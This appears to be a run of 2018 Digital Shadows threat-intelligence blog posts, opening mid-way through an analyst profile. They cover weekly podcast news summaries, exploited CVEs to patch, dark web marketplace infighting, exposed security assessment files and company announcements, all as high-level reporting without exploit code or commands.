Finally, listen. This sector is a real mishmash of people with different skills and experiences, and everyone has a slightly different way of looking at a problem, which can draw out some really interesting and beneficial elements.



Rose Bernard has worked as an intelligence analyst for Digital Shadows since January 2018. Prior to this she worked for Control Risks as a cyber threat analyst, and for the National Crime Agency where she focused on counter narcotics in Afghanistan and Pakistan. Rose holds an MA in History and Languages from University College London and is currently gaining her doctorate at Kings College London, where she is creating a framework for intelligence sharing between civilian and military organizations in the case of public health events of international concern (PHEIC). Her particular interests include the evolution of Latin American cybercrime and mapping the dark web. See her blog posts here

Learn more about our Intelligence Analysts in our Security Analyst Spotlight Series.


Interested in hearing more from our intelligence team? Check out our blog or subscribe to our weekly threat intelligence podcast: ShadowTalk.

A New Approach for Channel Security Consultants Tue, 22 May 2018 15:39:54 +0000 Old school security practices simply don’t fit the new IT environment.  Cloud computing, applications and distributed workforces have changed the security game. The days of building perimeter walls still exist, but the walls are disappearing.  This leaves channel security consultants wondering what the right allocation is for security budgets. As indicated in a 2016 SANS report on security spending trends, the goals of an organization often do not match their actual security spend. Compliance and data protection are some of the key drivers in today’s ideal security spend – but is this really where funds are being concentrated? Of course, we all need standard measures such as authentication, firewalls, end-point and malware protection. The question is, how can channel security consultants recommend a solution that doesn’t take away from what’s needed as a baseline and still addresses the true goals of an organization? 

Modern Day Threats    

Security has become more complex with today’s threats and risks. Big breaches have hit the headlines year after year.  What’s the main cause of these breaches?  According to the 2017 Verizon Data Breach report, 81% of hacking-related breaches leveraged stolen or weak passwords. In the more recent 2018 Verizon report, the use of stolen credentials was the leader in the “top 20 action varieties in breaches” (ahead of memory scraping, phishing and privilege abuse). Today’s threat actors are well connected and communicate effectively across messaging platforms, social media, and the deep and dark web to share compromised information such as passwords. So, what strategies and tactics can a channel security consultant deploy to address these security threats? 

A Preventative Approach to Security

Breaches are never expected, which is the reason why organizations should move to a more proactive approach. One-off assessments fail to provide a continuous method to search and hunt for threats and vulnerabilities. I’m not referring to the SOC hunting done once an attacker is present. That’s an escalated procedure that needs to be addressed and repaired immediately. Instead, I mean identifying and capturing the compromised information, data, credentials or vulnerabilities used before an attacker has entered your environment. Here are some examples:

  • Someone squatting or impersonating a domain to harvest credentials
  • Compromised data or credentials shared and sold on criminal forums
  • Employees inadvertently oversharing on social media
  • Third parties compromising data due to weak policies

Wouldn’t it be great if channel consultants could find nuggets of threat-led information for their clients before they were attacked? Using a preventative approach to security can help. If you know the threat before the attack occurs, it’s easier to combat and set your defense (security). This approach allows the team to become more effective in dealing with modern day risks.

A continuous monitoring and management approach in the open, deep and dark web fits the bill for understanding and applying a preventative approach to these risks. Sifting through mounds of alerts, false-positives and “gotchas” can be cumbersome for any organization or Managed Security Service Provider (MSSP). More so, a common security challenge we all face is talent. Security talent is hard to find and keep. To best ensure a preventative approach, an analyst needs to be there to contextualise and evaluate the relevance and impact of threats to your particular organizations’ circumstances. This can be a member of your security operation team or a vendor’s. Having a client chase their tail on real-time false alerts can cost more money than it’s worth. 

Rebalance Security Spending

Most financial advisors will comment on rebalancing your 401K when the market shifts.  When stocks go up, your allocation is most likely higher due to markets changing.  In the case of security, consultants should consider rebalancing their client’s allocation of security spend to address modern day threats and risks. A consultant approach to security budgets should address the methods of harvesting and capturing data or compromised credentials before they are used in an attack. A little more security allocation in the preventive bucket can greatly reduce the amount the organization would spend if they are compromised and breached.


About Digital Shadows’ Channel REV Partner Program

Digital Shadows enables organizations to manage digital risk by identifying and eliminating threats to their business and brand. Channel partners leverage Digital Shadows to monitor for digital risk across the widest range of data sources within the open, deep and dark web to deliver tailored threat intelligence, context and actionable remediation options that enable security teams to be more effective and efficient. Our partners help their clients protect their data when exposed, if employees or third parties put them at risk, or if their brand is being misused. To learn more, visit








To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Shadow Talk Update – 05.21.2018 Mon, 21 May 2018 13:26:50 +0000 In this week’s episode of Shadow Talk, Digital Shadows’ Head of Security Engineering, Dr Richard Gold, joins the pod to explain the EFAIL vulnerability affecting Open PGP (Pretty Good Privacy) and S/MIME (Secure/Multipurpose Internet Mail Extensions), as well as other flaws identified in encrypted messaging platforms. Dr Gold also outlines the the factors you should be considering to prioritize your patching.

In part two, we look at the 15 million dollar thefts in Mexico and outline the risks facing interbank payment systems.

Millions stolen from Mexican banks using interbank system

More than $15 million was reportedly stolen from Mexico-based banks by unidentified attackers who submitted fraudulent transfer orders via the SPEI, an electronic payment system developed and operated by Banco de México. The April 2018 theft subsequently forced Mexican banks to adopt contingency plans for interbank payments. Flaws in third-party software were likely used to access the SPEI, drawing comparisons to previous thefts that exploited the SWIFT interbank platform. More details are likely to be released in the short-term future (within three months).


SilverTerrier phishing attacks secure USD 3 billion profit to date

A collective of predominantly Nigeria-based threat actors, known collectively as SilverTerrier, have delivered phishing attacks using information-stealing malware and remote-access trojans against targets in multiple sectors and regions. The threat actors demonstrated a range of technical skills, but also some poor operational security practices, including using the same credentials to register malicious domains and personal social media profiles. According to law-enforcement entity estimates, the attacks equate to more than $3 billion in losses from the targeted companies to date.


Proof of concept attacks decrypt PGP and S/MIME encrypted emails

On 14 May 2018 three universities collaborated to outline two proof of concept attacks allowing emails sent using OpenPGP and S/MIME to be displayed in plaintext under certain conditions. PGP is an encryption program that provides cryptographic privacy and authentication and S/MIME is a standard for public key encryption. The “EFAIL” attacks required existing access to encrypted emails. In the first attack, a threat actor could hypothetically use the method that certain email clients use to access Hypertext Markup Language (HTML) in PGP or S/MIME emails, to decrypt and exfiltrate cipher-text to an attacker Web address. The second attack relied on attackers having existing knowledge of a plaintext block, and largely affected the Cipher Block Chaining gadget in S/MIME. This could be used to decrypt multiple emails. Given the potential of access to encrypted data, if deployed, this attack vector would likely be used by threat actors with highly specific intelligence-gathering aims and substantial intent and resources.


Cryptocurrency miner targets Oracle WebLogic vulnerability

Threat actors using the CoinMiner cryptocurrency malware are actively targeting a remote code execution flaw affecting the application server Oracle WebLogic. There has been a recent uptick in attacks targeting the vulnerability, designated CVE-2017-10271. The infection process was like that of another recent attack in February 2018, which distributed mining malware by exploiting a flaw in Apache database software CouchDB; it was possible the same threat actor was responsible for both attack campaigns, though this was unconfirmed. Patches are available to address the vulnerability, but more attempts at exploitation are highly likely.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Patch Priorities: 10 Vulnerabilities You Should Pay Attention To Thu, 17 May 2018 14:30:06 +0000 Not all vulnerabilities are created equal, and those that have been exploited by threat actors carry more weight. Last month, Digital Shadows reported on ten software vulnerabilities that were publicly exploited by threat actors. The motives for these attacks included information theft, espionage, financial profit, and disruption. The three key takeaways were:


  1. Drupal vulnerabilities among the highest severity vulnerabilities. CVE-2018-7600 is a remote code execution (RCE) vulnerability affecting versions of the Drupal content management system (CMS). According to public reports, this was the most targeted vulnerability in April 2018 by actors conducting cryptocurrency mining activity, but the flaw was also exploited to create a botnet to conduct distributed denial of service (DDoS) attacks. Similarly, another vulnerability identified by Drupal was CVE-2018-7602. Security patches have been released, but a threat actor has already reportedly exploited the vulnerability to deface a Ukrainian government website. Both Drupal vulnerabilities are highly likely to continue to be exploited in the near future.
  2. Eternal blues. Attackers continue to exploit the vulnerabilities CVE-2017-0145 and CVE-2017-0143, also known as ETERNALROMANCE and ETERNALBLUE. These exploits were publicly released by the Shadow Brokers threat group in April 2017 and have been used in a variety of campaigns to date. Both attacks exploiting these flaws in April 2018 were financially-motivated; a cryptocurrency and a ransomware campaign.
  3. CVE-2017-11882 has longevity. The Microsoft Office Memory Corruption Vulnerability that allows for remote code execution, has been targeted consecutively since November 2017 when proof of concept code was publicly leaked, despite the release of security patches addressing the flaw. More attempts to exploit this vulnerability are highly likely in the short-term future (next three months).


The table below provides an overview of the vulnerabilities, including an indication of how widely they were discussed across social media and other sources of potential insight into their popularity. Specifically, it shows: 

  • A CVE reference number and hyperlink to the United States National Vulnerability Database (NVD)
  • A description of the vulnerability type and affected system versions
  • The number of incidents Digital Shadows reported on this vulnerability during April2018 
  • The severity of the vulnerability as assigned by the NVD
  • A current status on whether a patch is available, and hyperlink to additional relevant details
CVE Number Description Observed Motivations Number of DS incidents CVE score Patch status
CVE-2018-7600 RCE vulnerability affecting Drupal CMS versions pre-7.58, 8.x before 8.39, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. Financial and Disruption 3 Critical Patch available

CVE-2017-8570 RCE vulnerability in Microsoft Office. Information Theft 2 High Patch available

CVE-2018-7602 RCE vulnerability affecting Drupal Core 7.x and 8.x Financial and Disruption 1 TBD, awaiting analysis Patch available

CVE-2016-3353 RCE vulnerability affecting Microsoft Internet Explorer 9 through 11. Financial 1 High Patch available

CVE-2018-0802 RCE vulnerability affecting Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016. Information Theft 1 High Patch available


CVE-2018-0171 RCE vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software. Disruption 1 Critical Patch available

CVE-2015-3636 Local privilege escalation in the Linux kernel pre-version 4.0.3. Information Theft 1 Medium Patch available

CVE-2017-11882 Vulnerability in Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 permitting an attacker to run arbitrary code. Financial 1 High Patch available

CVE-2017-0145 RCE vulnerability in the Server Message Block (SMB) v1 server in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016. Financial 1 High Patch available

CVE-2017-0143 RCE vulnerability targeting SMB v1 server in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016. Financial 1 High Patch available

Table 1: Summary of vulnerabilities reported as exploited in April 2018


It’s a constant challenge to understand which patches you ought to prioritize applying, but this blog provides information that can help to feed into your decision. If you are running the applications, systems and services listed, these are the 10 vulnerabilities you should be paying attention to. The next post in this series will provide a similar analysis of vulnerabilities for May 2018.


To stay up-to-date with the latest vulnerabilities and threat intelligence, subscribe to our newsletter.

Digital Shadows 7th Anniversary – A Look Back Wed, 16 May 2018 14:26:27 +0000 Today marks the 7th anniversary of Digital Shadows. As James and I looked back on the year, we were amazed in all that the team has accomplished within the last 12 months. We’d like to highlight a few of our accomplishments for the year and recognize our customers and our incredible team who has helped to make this year so successful.

Digital Shadows Raises $26M To Expand and Fuel Global Expansion

On September 20, 2017, we announced $26m in a Series C funding round to expand the capabilities of SearchLight and fuel global expansion. Led by Octopus Ventures, with participation from World Innovation Lab, Industry Ventures and all of Digital Shadows’ existing investors, the funding supports company growth and our continued commitment to protecting organizations with the best and most comprehensive digital risk management solution in the industry.

SearchLight: Shadow Search Announced, 15 New Engineers

From a product standpoint, we continued to enhance our SearchLight service to give customers even more value. Two specific highlights included hiring 15 new engineers to the team as well as announcing Shadow Search,  a feature within Digital Shadows SearchLight ™ that speeds up the security operations process, quickly enabling deeper research and faster investigation. The result is better decision making that gives back valuable time to security operations teams. Organizations have direct access to the vast repository of technical, tactical and strategic threat intelligence, and raw web content, curated and collected by Digital Shadows to investigate threats and take immediate action.

Shadow Search Digital Shadows

Digital Shadows Opens New State of the Art Offices in London and Dallas and Expands into Germany and Singapore

We now have nearly 200 employees across offices in London, San Francisco, Dallas, Singapore, and Frankfurt. With our $26M Series C funding last year, we committed to expand our business into Asia and Europe to support customers on a global basis. Below is a photo from our ribbon cutting ceremony in London.

Digital Shadows Opens New Office London


Women’s Network and Other Diversity Initiatives

With the accelerated growth we’ve seen this year, we’ve also launched a few initiatives to prioritize diversity at Digital Shadows, including our new Women’s Network that we announced just last week. We want talent that is diverse across the board, with different backgrounds, experiences, and opinions to help excel the business forward with more informed decisions. We are proud that women make up over 30% of Digital Shadows and play an incredibly important role in all parts of our business.

Top Research Findings by our Intelligence Team

Our expert Intelligence Team conducted a great deal of interesting threat intelligence research this year. Just a few of the headlines and topics included:

  • Misconfigured FTP, SMB, Rsync, and S3 Buckets Exposing 1.5 Billion Files
  • The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud
  • The Business of Disninformation: A Taxonomy | Fake News is more than a political battlecry
  • Inside Online Carding Courses Designed for Cybercriminals: Credit Card Fraud Gangs Cashing in on $24 billion a year
  • Equifax Breach Lessons Learned

Find all of their great threat intelligence research on our resources center.

Launch of Digital Risk Management Technology Ecosystem, Channel Rev Partner Program + New Partner Portal

Formed from 15+ technology companies, with more about to join the program, the Digital Risk Management Technology Ecosystem partners all share a vision for how security analytics and security information and event management (SIEM), product orchestration and automation, risk & compliance, intelligence and network enforcement, must work together to best protect customers from today’s digital risks. We also launched our channel only partner program – Channel REV – and an associated online Partner Portal, designed to accelerate partner revenue and enhance their customers’ loyalty.

We’ve accomplished quite a lot this year, but we’ve also made sure to have plenty of fun. Take a look below at some of our social events, conference parties, charity functions, and more. Thanks for another great year, everyone!

Shadow Talk Update – 05.14.2018 Mon, 14 May 2018 15:17:24 +0000 In this week’s episode Shadow Talk we look at the Winnti Umbrella group, asking what this means for organizations. We discuss vulnerabilities in Microsoft Office (CVE-2018-8174) and basestriker. And, finally, we outline the fall out surrounding the Olympus dark web marketplace.


Chinese state-associated threat actors linked under one umbrella

Individual threat groups and actors conducting politically motivated operations have been identified as working in one Chinese state-associated collective, known as the Winnti umbrella group. Identification of this group was made possible by operational security mistakes made by some of the actors and groups, which revealed overlapping command-and-control (C2) infrastructure used in operations previously seen as unrelated. One favored tactic among the attackers was the theft of code-signing certificates from software companies, which were then used in later attacks to obfuscate malicious components. The collective demonstrated varying technical capabilities but were persistent in their approach, and should be considered a highly credible threat.


Patch delay leaves Intel CPUs vulnerable to exploitation

Technology company Intel has delayed the release of security patches designed to address newly identified flaws affecting their CPUs. The delay means the vulnerabilities may be publicly disclosed before patches are made available. These “Spectre-NG” vulnerabilities relate to previous “Spectre and “Meltdown vulnerabilities, and could be exploited by attackers to secure control of a compromised system. The initial patches were due to be released on 21 May 2018, with additional patches to be released in August 2018.


Cryptocurrency miners target multiple exploits

A new cryptocurrency mining campaign is targeting three exploits to distribute a variant of mining malware. The vulnerabilities affected the Oracle WebLogic Server, Apache Struts 2 and the Server Message Block v1 server in the Microsoft Windows operating system. The third flaw is known as “ETERNALBLUE”, an exploit previously assessed to have been developed by the United States National Security Agency and publicly released by the “Shadow Brokers threat group in April 2017. Patches are available for all the vulnerabilities.


Zero-day exploitation of CVE-2018-8174 attributed to DarkHotel group

Security company Qihoo360 reported that espionage group DarkHotel (aka APT-C-06) has exploited a zero-day vulnerability to target China-based foreign trade entities. The patch for the flaw was released by Microsoft on 08 May 2018, and is the first observed use of the URL Moniker programming architecture to load an Internet Explorer exploit. The flaw enables an attacker to render a webpage using the Internet Explorer engine, even if Internet Explorer is not set as the default browser on the device.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Offsetting Dunbar by Developing Diversity Tue, 08 May 2018 15:36:30 +0000 Some of you may be familiar with the Dunbar Number, 150, being the maximum amount of relationships one individual can maintain successfully. Having recently surpassed this number ourselves, this is the perfect opportunity to think more about how we foster culture, diversity, and learning.

As we enter into our seventh year as a company, we will be launching a few initiatives to refocus and prioritize diversity and learning at Digital Shadows. Namely, I am excited to announce that we will be launching a Women’s Network.

During our London Office Launch on April 26th, our CEO, Alastair Paterson told the story of his relative being one of the Codebreakers at Bletchley Park during World War II. At that time, over 70% of the individuals involved were women. Now, women make up just over 10% of individuals working within the Cyber Security Industry. That is not progress.

We want to change that. Currently, Digital Shadows is made up of 32% women, but this isn’t enough. A diverse workforce and safe environment is demonstrably the right thing to do, but there are also tangible business benefits to having talent that doesn’t think the same. In order for us to provide best in show intelligence, we need a difference of backgrounds and experiences to make more informed decisions and to rely less on group think. This doesn’t stop at gender, but continues with culture, age, and language as well.

The more we can nurture the exceptional differences we have, the more comfortable we will be to innovate, to challenge the way in which we understand both the cyber world and how we provide service to our clients, and also how we foster the development of the incredible individuals that make Digital Shadows so unique. One of our four values after all is, “All about People”.


To learn more about the company, visit our About Us page.

Shadow Talk Update – 05.07.2018 Mon, 07 May 2018 15:00:26 +0000 In this week’s episode Shadow Talk, it’s a vulnerability extravaganza. We cover malicious use of legitimate software, as APT28 is attributed to hijacking LoJack and Blackrouter delivered via AnyDesk software. Vulnerabilities found (and exploited) in GPON home routers, and Loki Bot exploits two remote code execution vulnerabilities in Microsoft Office (CVE-2017-8570 and CVE-2018-0802).

Microsoft Office flaws exploited to deliver Loki Bot

Distributors of the Loki Bot information-stealing malware are exploiting two remote code execution (RCE) vulnerabilities in Microsoft Office: CVE-2017-8570 and CVE-2018-0802. CVE-2018-0802 is associated with another flaw (CVE-2017-11882), and only devices that have applied the patches for that vulnerability can be exploited in the new attacks. Because Loki Bot is widely available on online criminal forums, there has been no attribution for the recent activity. Proof of concept (PoC) code has been released online, which has highly likely enabled attackers to target both vulnerabilities.

Cyber incident affects Mexican inter-bank money transfers

News service Bloomberg reported that three Mexican banks were forced to use contingency plans for monetary transfers after a cyber “incident” affected connections with the Interbank Electronic Payment System (SPEI). The SPEI is a nearly real-time hybrid settlement system that enables transfers between participating banks, and is operated by Mexico’s central bank (Banco de México). At the time of writing, few details of any intrusions are publicly available. Attacks targeting specific banks and their internal systems are often conducted by threat actors with a good knowledge of banking payment infrastructure. This incident followed a failed attack on a Mexican bank’s SWIFT platform in January 2018.

GravityRAT evades detection for two years

A previously unreported RAT, dubbed GravityRAT, allegedly targeted organizations in India, and has been under development for the past two years. GravityRAT has similar functionality to pre-existing RATs, including file extraction and RCE. GravityRAT evaded detection for multiple years despite the C2 infrastructure remaining static throughout its evolution. This likely indicates that there were a few attacks against organizations, and that it was unlikely to have represented a significant threat.

Rubella Macro Builder crimeware kit used in banking malware campaigns

Malware distributors have been using a new crimeware kit, called Rubella Macro Builder, for attacks. The kit is available to rent from Russian-language criminal forums at a relatively low price, and offers a range of functions pertaining to payload execution and encryption. The attack vector relies on social engineering, in sending emails with malicious Microsoft documents attached: an unsophisticated but consistently popular distribution method. Since its emergence in February 2018, the kit has undergone modification and developments, and more improvements are highly likely in the short term.



Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

The Other Side of the Counter: DDoS, Social Engineering, Spambots and Insider Risks to Criminal Locations Wed, 02 May 2018 14:53:08 +0000 An enduring characteristic of dark web marketplaces is how frequently they’re offline, often through denial of services attacks. While marketplace administrators can stand to make big bucks, they’ve got their own threat models to be worried about:

  • law enforcement,
  • disgruntled consumers,
  • and competitors

Each of these have vested interests in seeing their site inaccessible. Tor sites are anonymous but not necessarily robust; many are vulnerable to DDoS attacks and, more destructively, site hijackings. We have observed that cybercriminals spend as much time attacking other cybercriminals as they do innocent victims. However, we have also observed that the dark web is not a digital ‘wild west’ where anything goes. Far from it. If you publicly take another Tor site offline, you had better have had a good reason to do so.

This infighting can have a negative impact on the trust their customers place in them. Trust is a precious commodity, and there’s a delicate balance between self-preservation and self-destruction. In a move to consolidate their market position within the criminal ecosystem dark web, the promising new kids on the block, Olympus, may have achieved the opposite.


Competing interests and interesting competitions

Be it by rivals or law enforcements, the targeting of marketplaces is common. We’ve observed this for many years and it’s definitely not a new phenomenon. Social engineering is particularly common, spoofing the marketplace’s logon page to harvest the credentials of its users so that another competitor marketplace can expand their own user base. One suspicious onion domain (alphabay2qlxrxff[.]onion) is currently active that appears to be doing just that (Figure 1). Such is the ubiquity of this technique, it’s common to see the list of official mirrors posted on the login pages of marketplaces to inform unsuspecting visitors of the likely risks.


Figure 1: A suspected spoof site targeting the Dream marketplace


But social engineering is just one technique we’ve seen targeting marketplaces. In 2017, we came across Figure 2, a posting on Hansa of a “Alphabay Forum Bot”, a script to spam Alphabay users and benefit from their significant audience. (You know it’s 2017 when 0.1179 BTC is less than a third of the value of bitcoin than it is now.)


Fig 2: A former listing from Hansa, selling a bot to spam AlphaBay users, from 2017


The overall dark web marketplace community hasn’t quite attracted the same amount of traffic (both on the vendor and buyer side) since the takedowns of AlphaBay and Hansa in July 2017. At its zenith, Alphabay was the 900-pound gorilla and boasted hundreds of thousands of users. Just as AlphaBay had done following Evolution market’s 2015 exit scam, their competitors sought to become the dominant market. Many marketplaces have fallen short of filling this this vacuum, including Dream market, Wall Street Market and Tochka. Nonetheless, the race is clearly still on to dominate the market and one of the most promising candidates is Olympus.



Insider threats apply to dark web markets too

After having been slowly develop a good reputation, the admin of Olympus last week claimed that they were in the process of hacking Dread (Figure 3). Dread is – or at least was –  a reddit-style community run by a user infamous for pointing out security flaws in other dark web marketplaces.


Fig 3: The initial claim from Olympus. Screenshot from Deepdotweb


Public apologies and public relations

However, it soon transpired that this was not a “hack” in the traditional meaning. Instead, the admin of Olympus allegedly acquired access to the Dread servers from an insider. You can read a more thorough account of saga in Deep Dot Web. What was significant about this incident was that the user community of Dread rallied behind the designer of the Dread forum, with consensus finally settling that Olympus was in the wrong and Dread was the innocent victim. In the end the moderators of Olympus issued an apology to the Dread admins for their actions (Figure 4). Tellingly Olympus seems to be aware of the damage it has caused to its own reputation stating that it will  hire a “good PR within the next few days”. Just as with legitimate businesses, a positive public image is important to drive revenue.


Fig 4: An apology from an Olympus moderator, from 25 April 2018


Customer trust is as important for criminal as it is legitimate business

When the two tactics of audience attraction (spam and rival forum sabotage) are viewed together an interesting picture of the current state of the cybercriminal dark web emerges.

Trust is hard to build up, but incredibly easy to lose. Just as we’ve seen with bungled responses, the immediate aftermath of a negative event is an important time period. Of course, it’s important not to over inflate this. Just as we’ve discussed in a previous blog,  The Future of Marketplaces, trust is just one factor that determines the success of new marketplaces. User experience, secure communications and content control are all drivers that shape who comes out on top.

There are other lessons that can be applied. This saga also serves as a timely reminder for organizations to consider their threat model. The nature of their customers and the data they hold make marketplaces a target for law enforcement and competitors. Organizations should also consider what data they hold, how their online activities can leave them exposed, and assess which adversaries stand to benefit from targeting this.

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Shadow Talk Update – 04.30.2018 Mon, 30 Apr 2018 15:02:02 +0000 In this week’s episode of Shadow Talk, we cover the targeting of healthcare organizations by Orangeworm, BGP hijacking, vulnerabilities in MikroTik routers, DDoS market shutdowns, and the profitability of cryptocurrency mining.



Orangeworm actively targets healthcare via supply chain

Security software company Symantec reported on a newly identified threat group called Orangeworm, observed targeting entities in the healthcare industry with custom backdoor malware. Multiple geographies have been affected, which is likely the result of Orangeworm attacking international organizations. Orangeworm conducted information theft and reconnaissance, but the group’s exact motives are unconfirmed at the time of writing.


Spam campaign drops multiple payloads

A new spam campaign is targeting multiple geographies with a quartet of malware that comprises the “Adwind” RAT, backdoors “XTRAT” and “DUNIHI”, and the information stealer “Loki Bot. All the payloads are highly configurable and enable various malicious activities, including information theft and remote-access tasks. This is the first reported instance of the malware being bundled together in a spam campaign, having previously been distributed in separate attacks.


Botnet exploits Drupal vulnerability

A botnet is actively targeting six exploits, including the remote code execution (RCE) vulnerability affecting the Drupal CMS. Its aim is to perform DoS attacks and mine cryptocurrencies. CVE-2018-7600 was classified as “highly critical” when publicly announced, and security updates have been released to address the flaw. This is the first identified incident of a threat actor targeting this vulnerability. Based on the popularity of RCE exploits, additional targeting is highly likely in the immediate future (next few weeks).


Threat actor zeroes in on Internet Explorer zero-day vulnerability

Security company Qihoo360 reported the exploitation of a zero-day vulnerability affecting the Internet Explorer browser’s kernel code by an unidentified threat actor. The vulnerability was labeled a “double play” loophole, but Microsoft has yet to release more technical details or information pertaining to the exploitation. The flaw reportedly affects all current versions of Internet Explorer and applications using the kernel.

The critical code of the kernel is usually loaded into a separate area of memory, which is protected from access by application programs or other, less critical parts of the operating system.

Digital Shadows Opens New State of the Art London Office in Canary Wharf Thu, 26 Apr 2018 16:52:17 +0000 When myself and James Chappell set the company up six years ago at a kitchen table in Camden, London, we suspected we had a good idea, but we didn’t quite envision just how cybercrime would proliferate and just how hard and complicated it would become for organizations to manage their digital risk. That’s where we feel we can help and why we have made such a bold bet on the future of Digital Shadows. After 6 years of incredible growth, protecting hundreds of customers across the globe, I am excited to announce that Digital Shadows has opened a new state of the art London office in Canary Wharf.

Digital Shadows Office Launch 1


We now nearly have 200 employees across the globe and London remains the beating heart of the operation where all of our product and engineering work occurs. Our new office in Canary Wharf marks a long-term commitment to London and means that we are now set up to expand the business significantly and service our clients even better. As a first step, we expect to create at least 20 jobs in London over the next year.

Today we hosted nearly 100 customers, employees, investors, advisors, media, friends, and family at the new office to celebrate. James helped me kick-off the event with a speech thanking all who have helped us advance Digital Shadows to this point. We then heard from guest speakers Lord Ashton, Sir George Iacobescu, Alex Macpherson, and Ben Brabyn and then we had a ribbon cutting ceremony.


Digital Shadows Office Launch 2

Digital Shadows Office Launch 4

Digital Shadows Office Launch 3


What an event! It was a celebration of what we have accomplished so far and what is to come to help make the world a safer place. Thanks again to everyone who has helped us arrive here. We are excited for the future growth of the company and I can’t wait to see what evolves next. Cheers!

Keys to the Kingdom: Exposed Security Assessments Tue, 24 Apr 2018 15:04:27 +0000 Organizations employ external consultants and suppliers to perform assessments and penetration tests that help to bolster their overall internal security. When carrying out these projects, these contractors are often given a level of privileged access and insight into the most sensitive areas of an organization’s infrastructure. These exercises, however, don’t serve their envisioned purpose if security reports are made available online for anyone to find. Our recent research paper, “Too Much Information”, shines a light on this worrying discovery.

Imagine giving a houseguest or handyworker a set of keys to your home. Now picture these individuals, albeit unwittingly, making copies of these keys and leaving them lying around in public for anyone to get hold of. Similarly, as consultants and pen testers backup and share their work, highly sensitive information such as vulnerability assessments and network diagrams can be left exposed and, crucially, within the reach of malicious actors.

Our analysis of files shared across network sharing services and storage solutions such as Amazon S3 and NAS drives included thousands of instances of security audits (5,794), “network infrastructure” details (1,830) and penetration test reports (694) publicly accessible.  


Figure 1: Results for security assessment files and documents


Ready-made reconnaissance

Coming across this type of sensitive information would be like striking gold for an attacker or cybercriminal. Attackers spend months conducting reconnaissance to learn all about their target’s security posture, infrastructure layout, deployed technologies, and potential vulnerabilities. This exposure would save them precious time and resources. In some cases, it can even provide them with the type of exclusive information that they would never have learned through passive reconnaissance.

In one instance, we found a series of security documents belonging to a leading European supplier of electronic identification services used within the banking industry. These files included in-depth security assessments, source code testing results, and vulnerability scanning reports that revealed details on insecure servers. These reports exposed server locations and hosting IPs, missing software patches, port information, CVE number and vulnerability descriptions (see Figure 2 below). With this intelligence, an attacker would know what specific technologies and services to target, and could then modify data, inject malicious code, or perform man-in-the middle attacks.


Figure 2: Redacted spreadsheet outlining critical vulnerabilities in banking software


Unintentional insiders and supply chain risk

Organizations typically struggle with security issues that lie outside their direct visibility, beyond their perimeter. This includes employees conducting work-related activities using public devices, or a contractor backing up files to their misconfigured NAS drives. Supply chains and company insiders are therefore a thorn in the side with regards to protecting company data.

It’s not just about these individuals work habits when they’re outside company networks, even the very process of managing access restrictions for third parties comes with a host of potential pitfalls. We can all imagine situations where we open up network services to move data around or allow a third party temporary access (for example troubleshooting, software support, reporting), but it never gets revoked. Permissions can be confusing, especially when an S3 bucket needs to be open to a select group of individuals but closed to everyone else. This is when mistakes are made.

Given the amount of data exposed in this way, the long-term solution to this problem lies in training and awareness. Organizations can play their part by educating employees, contractors and consultants about the risks of copying and archiving up work files at home. Offering secure-by-default storage solutions so that these individuals don’t feel the need to backup their devices at home could also go a long way to preventing this level of exposure.  


To learn more about the level of data exposure across the world, as well as useful tips for mitigating these risks, download a copy of our report.

Want more Digital Shadows research? Subscribe to our threat intelligence emails here.


Shadow Talk Update – 04.23.2018 Mon, 23 Apr 2018 15:30:32 +0000 This week’s Shadow Talk discusses Russia’s attempts to ban the social messaging app, and also read between the lines of the joint US and UK advisory on network infrastructure compromises by Kremlin-backed actors. We also outline new ransomware payloads incorporated into the Magnitude exploit kit and we bring you the latest news on vulnerabilities in the Drupal Platform and Cisco’s WebEx software.



Russian threat actors compromised network infrastructure

On 16 April the US-CERT and the United Kingdom NCSC published a joint technical advisory regarding the compromise of network infrastructure in multiple sectors by Russian state-backed threat actors. Since 2015 threat actors have scanned the internet to find infrastructure devices with legacy protocols or weak security, using default, stolen or brute-force cracked credentials to authenticate onto target devices. This allowed network mapping, man-in-the-middle operations and modification of firmware. Attackers may have obtained sensitive information, or secured a foothold for future operations.

The advisory release was likely to demonstrate cyber defense as well as political solidarity between the United States and United Kingdom—given political tension with Russia. The current threat activity level associated with this campaign is unknown and although security firms detected increases in scanning for some target devices, this was not independently attributed to Russian threat actors. Network infrastructure is a target for multiple threat groups, and considering the many unsecured devices and tools available to exploit them, this is likely to continue.


Drupal vulnerability exploited

PoC code for an RCE vulnerability (CVE-2018-7600) affecting the Drupal content management system was released online. Exploitation of the vulnerability was detected by security companies shortly after the PoC was published. Exploitation allows the compromise of legitimate and trusted websites, which can then be used to conduct malicious activity. Users should upgrade their Drupal systems to the most recent version.


RCE vulnerability affects Cisco WebEx

Certain Cisco WebEx products are vulnerable to a newly identified RCE vulnerability. If CVE-2018-0112 is exploited, an attacker could run arbitrary code on an infected system. Cisco has released upgrades to address the flaw; there are no reports of the vulnerability having been exploited in the wild to date.


Magnitude exploit kit switches ransomware payload

The Magnitude exploit kit was identified distributing the GandCrab ransomware, an updated payload for this exploit kit. Magnitude previously distributed “Magniber” and “Cerber” ransomware variants. There were no changes to distribution methods or target geographies. GandCrab was the delivery payload of multiple campaigns in 2018 and it appears to be relatively popular with threat actors, likely due to its nature as a ransomware-as-a-service. At the time of writing, there is no decryption tool publicly available for the version of GandCrab deployed in this campaign.

